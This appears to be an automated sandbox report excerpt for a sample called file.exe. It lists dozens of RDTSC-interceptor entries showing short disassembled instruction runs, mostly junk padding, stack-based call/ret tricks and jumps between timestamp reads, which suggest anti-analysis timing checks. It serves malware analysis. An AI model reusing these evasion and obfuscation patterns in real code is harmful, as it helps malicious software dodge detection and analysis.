Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5973 second address: EF59B8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD50Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2ADCh] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 mov edi, dword ptr [ebp+122D2968h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e mov edi, 3A5D6167h 0x00000023 pop edi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jp 00007F4FB8FDD4F6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59B8 second address: EF59C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59C5 second address: EF59CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69EB second address: EF69F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69F1 second address: EF69F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69F7 second address: EF6A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5B45 second address: EF5B5B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4FB8FDD4F8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A14 second address: EF6A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4B52 second address: EF4BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, si 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr [ebp+122DB04Eh], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F4FB8FDD4F8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b or edi, 2A999812h 0x00000041 mov eax, dword ptr [ebp+122D0659h] 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F4FB8FDD4F8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 0000001Ah 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 mov dword ptr [ebp+122D3042h], eax 0x00000067 mov ebx, dword ptr [ebp+122D2A88h] 0x0000006d push FFFFFFFFh 0x0000006f or ebx, 7A666D54h 0x00000075 nop 0x00000076 pushad 0x00000077 push esi 0x00000078 ja 00007F4FB8FDD4F6h 0x0000007e pop esi 0x0000007f push eax 0x00000080 push edx 0x00000081 jbe 00007F4FB8FDD4F6h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5B5B second address: EF5B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A18 second address: EF6A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A1E second address: EF6A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bl, 26h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4FB8D62278h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007F4FB8D62282h 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A6E second address: EF6A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A74 second address: EF6A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A6C second address: EF7AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 mov dword ptr [ebp+122D20B4h], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4FB8FDD4F8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jng 00007F4FB8FDD4FBh 0x0000002f mov ebx, 3AF9C49Bh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F4FB8FDD4F8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 clc 0x00000051 xchg eax, esi 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F4FB8FDD4FEh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7AE3 second address: EF7B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4FB8D62278h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4FB8D62280h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6C3F second address: EF6C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8DCF second address: EF8DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D6227Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7BFA second address: EF7BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7BFE second address: EF7C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8E7F second address: EF8E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAF2D second address: EFAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F82 second address: EF8F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F86 second address: EF8F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB48A second address: EFB48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F8A second address: EF902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FB8D62286h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 jns 00007F4FB8D62276h 0x00000019 pop eax 0x0000001a pop esi 0x0000001b nop 0x0000001c mov dword ptr [ebp+12452A18h], edx 0x00000022 push dword ptr fs:[00000000h] 0x00000029 movzx ebx, bx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F4FB8D62278h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jne 00007F4FB8D6227Fh 0x00000053 mov eax, dword ptr [ebp+122D0921h] 0x00000059 sbb ebx, 225A8184h 0x0000005f push FFFFFFFFh 0x00000061 movsx ebx, dx 0x00000064 push ecx 0x00000065 jbe 00007F4FB8D62286h 0x0000006b pop edi 0x0000006c push eax 0x0000006d jg 00007F4FB8D62284h 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB48E second address: EFB492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB492 second address: EFB498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB498 second address: EFB4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC460 second address: EFC4CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F4FB8D62278h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push edx 0x00000024 mov edi, dword ptr [ebp+122D2910h] 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d add edi, dword ptr [ebp+122D2EE4h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4FB8D62278h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, EA61h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 pushad 0x00000056 push eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4CD second address: EFC4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB769 second address: EFB76F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4D6 second address: EFC4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB76F second address: EFB775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4DA second address: EFC4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8FDD500h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC6A2 second address: EFC6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC6A6 second address: EFC712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F4FB8FDD4F8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 xor bh, 00000057h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D1817h], ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 xor ebx, 728E10A1h 0x0000003f mov eax, dword ptr [ebp+122D1549h] 0x00000045 mov dword ptr [ebp+122D3642h], edx 0x0000004b push FFFFFFFFh 0x0000004d pushad 0x0000004e sub cx, F30Ch 0x00000053 mov edx, 4D4E8975h 0x00000058 popad 0x00000059 nop 0x0000005a pushad 0x0000005b jns 00007F4FB8FDD4F8h 0x00000061 push edx 0x00000062 pop edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC712 second address: EFC716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC716 second address: EFC727 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC727 second address: EFC72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F032AD second address: F032B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B05C second address: F0B060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B1FE second address: F0B21A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A991 second address: E9A999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0EC7C second address: F0EC8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F4FB8FDD4F6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F4FB8FDD4F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0EC8E second address: F0ECA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F4FB8D62276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0ECA1 second address: F0ECB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4FB8FDD500h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0ECB9 second address: F0ECBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F461 second address: F0F46B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F5BD second address: F0F5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F5C1 second address: F0F5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F4FB8FDD506h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F5E3 second address: F0F604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4FB8D62276h 0x0000000a jmp 00007F4FB8D62287h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F604 second address: F0F63A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FB8FDD508h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jbe 00007F4FB8FDD4F6h 0x00000018 jng 00007F4FB8FDD4F6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F63A second address: F0F652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FB8D62282h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F652 second address: F0F657 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F7DD second address: F0F7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F7E7 second address: F0F7F1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8FDD4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FAE0 second address: F0FAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4FB8D62276h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FC3F second address: F0FC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1563D second address: F15647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F15647 second address: F15664 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F4FB8FDD4FEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 je 00007F4FB8FDD4F6h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14401 second address: F1440B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4FB8D62276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1440B second address: F1443B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FB8FDD509h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FB8FDD4FEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1443B second address: F14446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F4FB8D62276h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F145C8 second address: F145CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F145CE second address: F14602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F4FB8D62287h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F4FB8D62280h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14602 second address: F14606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14E22 second address: F14E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D6227Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1537E second address: F15388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA68D4 second address: EA68F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62285h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA68F0 second address: EA68FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FB8FDD4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B469 second address: F1B46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B46E second address: F1B476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B476 second address: F1B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1A2CE second address: F1A2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1A2D2 second address: F1A2D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1A2D6 second address: F1A2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE71A6 second address: EE722C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8D62276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F4FB8D62283h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ecx 0x00000016 jmp 00007F4FB8D62289h 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007F4FB8D62288h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 jmp 00007F4FB8D6227Ah 0x0000002c pop eax 0x0000002d push edi 0x0000002e cld 0x0000002f pop edx 0x00000030 call 00007F4FB8D62279h 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F4FB8D62281h 0x0000003d jmp 00007F4FB8D6227Bh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE722C second address: EE726A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8FDD50Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F4FB8FDD506h 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE726A second address: EE7294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4FB8D62276h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FB8D62288h 0x00000017 rdtsc
